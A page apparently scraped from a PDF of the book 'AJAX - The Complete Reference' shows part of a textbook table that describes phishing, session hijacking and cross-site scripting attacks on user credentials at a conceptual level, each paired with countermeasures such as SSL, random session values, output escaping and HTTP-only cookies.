issuhub.com

AJAX - The Complete Reference

(avery) #1

292 Part II: Developing an Ajax Library^


Attack Name Goal How It Is Performed

Possible

Countermeasures

Phishing /

false login

To have a user

inadvertently

disclose their

credentials.

Convince a user to visit a

compromised or evil site

disguised to look like the login

screen of the site to attack.

Hope the user is not aware they

are not at the correct site and

that they enter their credentials.

Educate users.

Provide a unique aspect

of the site that might be

customized to the user

which would be difficult to

forge.

Modify browser to show

location clearly or indicate

known phishing site.

Session

hijacking

To copy credentials

of another user to

assume or view

their session or

data.

With a network sniffer on a

compromised network segment,

the intruder may be able to view

session data such as cookies

and simply copy it. If session

cookies, URLs, or hidden fields

are predictable, the intruder

may simply derive an upcoming

value and wait until it matches

a user. Finally, an intruder may

get a user to divulge their cookie

via some JavaScript exploit

(see XSS), an intrusion on the

client system or through a social

engineering situation.

Use SSL encryption for

transmission.

Make sure your

sessionization system is

strongly random.

Provide short time limits

for session liveliness and

if possible bind the values

to browser or IP address

to avoid replay attacks.

Avoid echoing sensitive

information to screen

in case a session is

compromised, and

consider adding second

forms of authentication.

XSS (Cross-

site Scripting)

To get user to

execute code that

the intruder wrote

under their own

security context,

often in aim of

stealing a cookie

or performing a

script action on the

intruder’s behalf.

Intruder is able to submit

JavaScript code to a trusted

server that the user will later

download and run. The most

common place XSS happens

is on a message board or

comment system where the

intruder submits a script that a

future reader will later run when

they view the page. Considering

that JavaScript can access

cookies, this is one method for

an intruder to steal a user’s

credentials.

Input filtering is certainly

part of dealing with XSS

attacks, but escaping

output should also be

employed so the script

cannot be run.

Avoid cookies or use

HTTP-only cookies.

TABLE 7-3 Sampling of Attacks Focused on Gaining or Abusing User Credentials (continued)
Free download pdf
Get our desktop app
Company
Features
Documentation
Resources
© ISSUHUB. 2024. All rights reserved.